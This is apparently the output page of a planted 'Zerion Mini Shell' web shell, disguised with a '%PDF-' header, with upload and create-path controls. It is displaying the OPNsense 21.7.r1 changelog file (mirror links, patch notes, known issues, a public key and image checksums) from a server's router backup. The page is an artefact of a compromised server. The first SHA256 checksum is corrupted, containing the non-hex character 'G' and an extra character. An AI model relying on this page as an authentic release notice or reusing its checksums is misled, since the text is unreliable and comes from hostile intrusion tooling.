%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /proc/self/root/backups/router/usr/local/opnsense/changelog/
Upload File :
Create Path :
Current File : //proc/self/root/backups/router/usr/local/opnsense/changelog/21.7.r1.htm

<p>Hi there,</p><p>For more than 6 and a half years, OPNsense is driving innovation through modularising and hardening the open source firewall, with simple and reliable firmware upgrades, multi-language support, fast adoption of upstream software updates as well as clear and stable 2-Clause BSD licensing.</p><p>We thank all of you for helping test, shape and contribute to the project! We know it would not be the same without you.  &lt;3</p><p>Download links, an installation guide[<a target="_blank" href="https://docs.opnsense.org/manual/install.html">1</a>] and the checksums for the images can be found below as well.</p><p><ul><li>Europe: <a target="_blank" href="https://opnsense.c0urier.net/releases/21.7/">https://opnsense.c0urier.net/releases/21.7/</a></li><li>US East Coast: <a target="_blank" href="https://mirror.wdc1.us.leaseweb.net/opnsense/releases/21.7/">https://mirror.wdc1.us.leaseweb.net/opnsense/releases/21.7/</a></li><li>US West Coast: <a target="_blank" href="https://mirror.sfo12.us.leaseweb.net/opnsense/releases/21.7/">https://mirror.sfo12.us.leaseweb.net/opnsense/releases/21.7/</a></li><li>South America: <a target="_blank" href="https://mirror.venturasystems.tech/opnsense/releases/21.7/">https://mirror.venturasystems.tech/opnsense/releases/21.7/</a></li><li>Australia: <a target="_blank" href="http://mirror.as24220.net/opnsense/releases/21.7/">http://mirror.as24220.net/opnsense/releases/21.7/</a></li><li>Full mirror list: <a target="_blank" href="https://opnsense.org/download/">https://opnsense.org/download/</a></li></ul></p><p>Here are the full patch notes against 21.1.7:</p><p><ul><li>system: Norwegian translation (contributed by Stein-Aksel Basma)</li><li>system: correctly enforce "Disable writing log files to the local disk" when circular logs are not used</li><li>system: allow to edit gateway entries with non-conforming names</li><li>system: add HA sync entry for live log templates</li><li>system: lock config writes during HA merges</li><li>system: raised PHP memory limit to 1G</li><li>system: raised encryption standard for encrypted config.xml export</li><li>system: removed NextCloud backup from core functionality</li><li>system: allow more characters in the certificate/authority organization fields (contributed by Jan De Luyck)</li><li>system: default gateway failure state killing is now disabled by default</li><li>system: circular logs are now disabled by default</li><li>system: removed unused traffic API dashboard feed</li><li>interfaces: improve GRE/GIF configuration handling and dynamic reload behaviour</li><li>interfaces: remove duplicated handling of PPP IPv6 interface detection</li><li>interfaces: refactored address removal into interfaces_addresses_flush()</li><li>interfaces: flush IPv6 addresses on the correct IPv6 interface when it differs from the IPv4 interface</li><li>interfaces: do not check for existing CARP interfaces midstream</li><li>interfaces: remove non-tunnel restriction from address collection</li><li>interfaces: set tunnel flag for IPv4 tunnel plus cleanups</li><li>interfaces: allow interface-based overrides of hardware checksum settings</li><li>interfaces: refactor DNS lookup and add PTR to output (contributed by Maurice Walker)</li><li>firewall: set label for obsolete rule in live log (contributed by kulikov-a)</li><li>firewall: MVC rewrite of the states diagnostics pages under "States"</li><li>firewall: renamed "pfTables" diagnostics to "Aliases"</li><li>firewall: add quick link to states counter from firewall rule inspection</li><li>firewall: add manual reply-to configuration to rules</li><li>firewall: delete related rules when an interface group is removed</li><li>firewall: rename source/destination networks when group name changes</li><li>dhcp: remove ::/0 route from router advertisements (contributed by Maurice Walker)</li><li>dhcp: always deprecate prefixes in automatic router advertisements</li><li>dhcp: fix table header sorting in lease pages (contributed by vnxme)</li><li>dhcp: lock access to settings pages when interface is not suitable for running a DHCP server</li><li>firmware: introduced connectivity check</li><li>firmware: confirm plugin removal dialog</li><li>intrusion detection: fix alert reads from eve.json</li><li>ipsec: adhere to system defaults for route-to and reply-to when creating automatic VPN rules</li><li>ipsec: switched to explicit type selection for identities</li><li>network time: added NTPD client mode</li><li>openvpn: offer the ability to export a user without a certificate</li><li>openvpn: increase consistency between export types</li><li>unbound: fix domain overrides for private address reverse lookup zones (contributed by Maurice Walker)</li><li>console: throw error when opnsense-importer encounters an encrypted config.xml</li><li>mvc: reduce differentials in config.xml when saving models</li><li>ui: work on unification of add buttons by minifying them and adding primary color markup</li><li>ui: prevent translation line breaks from breaking JS</li><li>ui: switch firewall category icon for clarity</li><li>ui: inject default tooltips into bootgrid formatters</li><li>ui: removed $main_buttons magic handler</li><li>ui: improved JS hook_ipv4v6() to jump to /64 on IPv6 and back to /32 on IPv4</li><li>plugins: os-etpro-telemetry 1.5 exclude stale data from telemetry upload</li><li>plugins: os-fetchmail 1.0 (contributed by Michael Muenz)</li><li>plugins: os-freeradius 1.9.14[<a target="_blank" href="https://github.com/opnsense/plugins/blob/stable/21.7/net/freeradius/pkg-descr">2</a>]</li><li>plugins: os-maltrail 1.8[<a target="_blank" href="https://github.com/opnsense/plugins/blob/stable/21.7/security/maltrail/pkg-descr">3</a>]</li><li>plugins: os-nut 1.8[<a target="_blank" href="https://github.com/opnsense/plugins/blob/stable/21.7/sysutils/nut/pkg-descr">4</a>]</li><li>plugins: os-telegraf 1.11.0[<a target="_blank" href="https://github.com/opnsense/plugins/blob/stable/21.7/net-mgmt/telegraf/pkg-descr">5</a>]</li><li>plugins: os-zabbix5-proxy is now a plugin variant</li><li>plugins: os-postfix 1.9</li><li>plugins: os-net-snmp 1.5</li><li>plugins: os-frr 1.22</li><li>src: dhclient support for VLAN 0 decapsulation</li><li>src: FreeBSD updates for the pf(4) and iflib(4) subsystems</li><li>src: FreeBSD updates for Intel e1000, ixgbe and ixl drivers</li><li>src: compatibility shim for upcoming rtsold "-M" command line option</li><li>ports: drop hardening options to ease migration to FreeBSD ports tree</li><li>ports: libxml 2.9.12[<a target="_blank" href="https://gitlab.gnome.org/GNOME/libxml2/-/blob/master/NEWS">6</a>]</li><li>ports: nettle 3.7.3</li><li>ports: nss 3.67[<a target="_blank" href="https://firefox-source-docs.mozilla.org/security/nss/releases/nss_3_67.html">7</a>]</li><li>ports: openvpn 2.5.3[<a target="_blank" href="https://community.openvpn.net/openvpn/wiki/ChangesInOpenvpn25#Changesin2.5.3">8</a>]</li><li>ports: php 7.4.20[<a target="_blank" href="https://www.php.net/ChangeLog-7.php#7.4.20">9</a>]</li><li>ports: phpseclib 2.0.32[<a target="_blank" href="https://github.com/phpseclib/phpseclib/releases/tag/2.0.32">10</a>]</li><li>ports: python 3.8.10[<a target="_blank" href="https://docs.python.org/release/3.8.10/whatsnew/changelog.html">11</a>]</li><li>ports: sudo 1.9.7p1[<a target="_blank" href="https://www.sudo.ws/stable.html#1.9.7p1">12</a>]</li></ul></p><p>Known issues and limitations:</p><p><ul><li>NextCloud backup plugin removed from core, but not yet available as stable plugin via GUI.  Install manually from console as follows: pkg install os-nextcloud-backup-devel</li><li>IPsec identities are now set using their explicit type.  See StrongSwan documentation[<a target="_blank" href="https://wiki.strongswan.org/projects/strongswan/wiki/IdentityParsing">13</a>] for the old automatic defaults.</li><li>CLOG creating garbage logs when used.  Fix scheduled for 21.7-RC2.</li><li>Unbound advanced configuration not yet replaced.</li></ul></p><p>The public key for the 21.7 series is:</p><p><pre>-----BEGIN PUBLIC KEY-----
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA1Cc2Mw+t6NAgU5Ts8feU
+vJSn4N8Ex1afuZ/tyXnRwxQ7w0+Hr0Bs8Ygy2X67KQi/7pi5FQ/hIJyEnf5Tm/7
7sS6O6XPvu2fg7UN1RBi5VgFJh4vajwhVGUg+EpuMNIgZw7AkWNlULvQSLBHOX7S
FAthJQQ957OU2RARQA+LVT3wyiLpEhQp0S9h/YAO1tITQKlsPjlU4+0Iv58JZuAG
lek+FaZyBLqCUF4ItLxGjqO3L4cx5iy3yD7qIOR3dN7tncdEYxQweut8cA80hFUe
Wy8DgPUKVZRRZnVWSZp9QXzoo9ACLebAv6DOzN17DrVdO0iH6iYr6s/7tDoxtN0G
+r6huk0tTKQ0UJX7O9l5GAQe+HWFH1WxTU37Pb79BbxXW+9LCUtAZ35HKLmIaQyb
6t3Jr0FTX+LtJBMUpWtYIAYjQIH2dlBGbwFRbljsibbSTsi/E+1WW3ob1r5O5fML
b734CktIXm3HFvQ0qZ4DyIQDZS0J8zoVO2wHjlh9MsxCJdDvDXe6Dbj/Y93SBXVr
Az8T8YrEwjK0fPt8dB1p+Ue49eYXPs5lJPmB5iaiXlp1VTqUwH2Lm3BZG5bUKded
zOjHavmTeTXuSKWEYh/UP7mLGeY1FQF0o7VHJfdiJLt/4s2ybM9DNUssjSDBqBRV
CPvKwujGiI0N2BPJHP21g1ECAwEAAQ==
-----END PUBLIC KEY-----</pre></p><p>Please let us know about your experience!</p><p><br>Stay safe,<br> Your OPNsense team</p><p><pre>SHA256 (OPNsense-21.7.r1-OpenSSL-dvd-amd64.iso.bz2) = e1a9cd3296352a99f8a5ac7c7edd5f7161361fde4688115186292bed91252a1Gc
SHA256 (OPNsense-21.7.r1-OpenSSL-nano-amd64.img.bz2) = 94478b919bca3850f3afd213b15df6ad08904ac505e3ecc3d979b9cd33276afc
SHA256 (OPNsense-21.7.r1-OpenSSL-serial-amd64.img.bz2) = a72ef31a6e97644db8091cb9fa5cd7c785671da88c587ebbe417ac2fcb180202
SHA256 (OPNsense-21.7.r1-OpenSSL-vga-amd64.img.bz2) = bc7f9a3b36cf4b52b630ee5ff28b31044db4aabfdcb73f54177307d6fc5623ba</pre></p>

Zerion Mini Shell 1.0